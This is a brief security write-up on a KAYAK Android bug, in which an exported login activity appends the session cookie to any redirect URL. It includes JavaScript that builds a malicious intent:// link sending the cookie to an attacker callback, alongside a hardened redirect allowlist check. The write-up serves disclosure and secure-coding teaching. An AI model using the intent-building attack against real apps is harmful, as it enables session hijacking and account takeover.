Starts off with an exported (publicly reachable) activity in the KAYAK Android app and ends up with session hijacking.
The exported activity was ExternalAuthLoginActivity, which could be launched by any application or website. That isn't necessarily a problem in itself, but one of the things this activity does is read an EXTRA_REDIRECT_URL value from the incoming intent and append a parameter containing the user's KAYAK session cookie value to that URL, without checking where the URL points. So any malicious website could launch this intent with its own URL as the redirect target and receive a callback carrying a valid session cookie for KAYAK.
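The two halves of the bug, as an added example that is not KAYAK's code and not from the original write-up: first, how a web page launches an exported Android activity with a string extra through Chrome's intent:// URL syntax; second, the redirect-URL check the activity should have performed before attaching a session token (modelled here in JavaScript; in the real app the check lives in the activity's Java/Kotlin code). The extra key string "redirect_url", the intent-filter scheme "kayakauth", the package name "com.example.app", the query-parameter name "session" and the allowlisted host are all assumptions made for the example.

```javascript
// Chrome's intent:// syntax (the Android Intent.toUri(URI_INTENT_SCHEME) form):
//   intent://<host><path>#Intent;scheme=<s>;package=<p>;S.<key>=<value>;end
// "S." marks a String extra. The value is URL-encoded so ';' and '=' inside the
// attacker's callback URL cannot terminate the field early. Scheme, host, package
// and extra key below are assumptions for the example, not KAYAK's real values.
function buildIntentUrl({ scheme, host, path = "/", pkg, extras = {} }) {
  const fields = [`scheme=${scheme}`, `package=${pkg}`];
  for (const [key, value] of Object.entries(extras)) {
    fields.push(`S.${key}=${encodeURIComponent(value)}`);
  }
  return `intent://${host}${path}#Intent;${fields.join(";")};end`;
}

// What a malicious page would navigate to: the activity is asked to redirect to
// the attacker's server once it has appended the session cookie.
function attackerIntentUrl(callbackUrl) {
  return buildIntentUrl({
    scheme: "kayakauth",        // assumed intent-filter scheme
    host: "login",
    pkg: "com.example.app",     // assumed package name
    extras: { redirect_url: callbackUrl }, // assumed extra key
  });
}

// The vulnerable behaviour as described: take the caller-supplied URL and append
// the session cookie as a query parameter, with no check on the destination.
// (Parameter name "session" is an assumption.)
function appendSession(redirectUrl, sessionCookie) {
  const u = new URL(redirectUrl);
  u.searchParams.set("session", sessionCookie);
  return u.toString();
}

// Hardened check: parse the URL and compare scheme and host exactly against an
// allowlist. Prefix checks on the raw string are not enough:
// "https://www.kayak.com.attacker.example/" and
// "https://www.kayak.com@attacker.example/" both start with the trusted host.
function isAllowedRedirect(redirectUrl, allowedHosts) {
  let u;
  try {
    u = new URL(redirectUrl);
  } catch {
    return false;                               // unparsable or relative URL
  }
  if (u.protocol !== "https:") return false;    // no http:, javascript:, intent:
  if (u.username || u.password) return false;   // reject userinfo tricks outright
  return allowedHosts.includes(u.hostname.toLowerCase());
}

// Only attach the session token once the destination has passed the allowlist.
function safeAppendSession(redirectUrl, sessionCookie, allowedHosts) {
  if (!isAllowedRedirect(redirectUrl, allowedHosts)) {
    throw new Error(`refusing to redirect to untrusted URL: ${redirectUrl}`);
  }
  return appendSession(redirectUrl, sessionCookie);
}
```

The allowlist should be a fixed set of first-party hosts compiled into the app; deriving it from anything the caller controls (a second extra, the referrer, a prefix of the supplied URL) reopens the hole.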